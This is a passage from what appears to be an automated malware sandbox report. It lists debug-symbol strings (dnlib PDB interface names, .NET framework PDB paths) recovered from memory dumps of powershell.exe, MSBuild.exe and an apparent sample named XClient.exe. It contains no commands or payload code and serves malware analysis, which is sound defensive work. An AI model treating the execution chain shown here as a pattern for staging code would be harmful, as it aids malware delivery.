            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2607787321.0000000006B20000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2601959996.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 0000000D.00000000.1784223768.0000000000822000.00000002.00000001.01000000.00000008.sdmp, XClient.exe.12.dr
            Source: Binary string: mscorlib.ni.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDB source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Xml.pdbMZ@ source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2607787321.0000000006B20000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2607292773.000000000605B000.00000004.00000010.00020000.00000000.sdmp, WERB0BF.tmp.dmp.22.dr
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: System.Management.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: HP/o0C:\Windows\mscorlib.pdb~ source: MSBuild.exe, 0000000C.00000002.2607292773.000000000605B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: symbols\dll\mscorlib.pdbLb source: MSBuild.exe, 0000000C.00000002.2607292773.000000000605B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.1685514693.00007FFB4B040000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb5 source: MSBuild.exe, 0000000C.00000002.2579886766.0000000001139000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.pdb source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\MSBuild.pdb" source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: Accessibility.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: System.Core.ni.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: @;o.pdb source: MSBuild.exe, 0000000C.00000002.2607292773.000000000605B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2607292773.000000000605B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdb source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.pdbL0Fw# source: WERB0BF.tmp.dmp.22.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000009.00000002.1677115862.000001FFFEBF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.1647885740.000001FFF743B000.00000004.00000800.00020000.00000000.sdmp
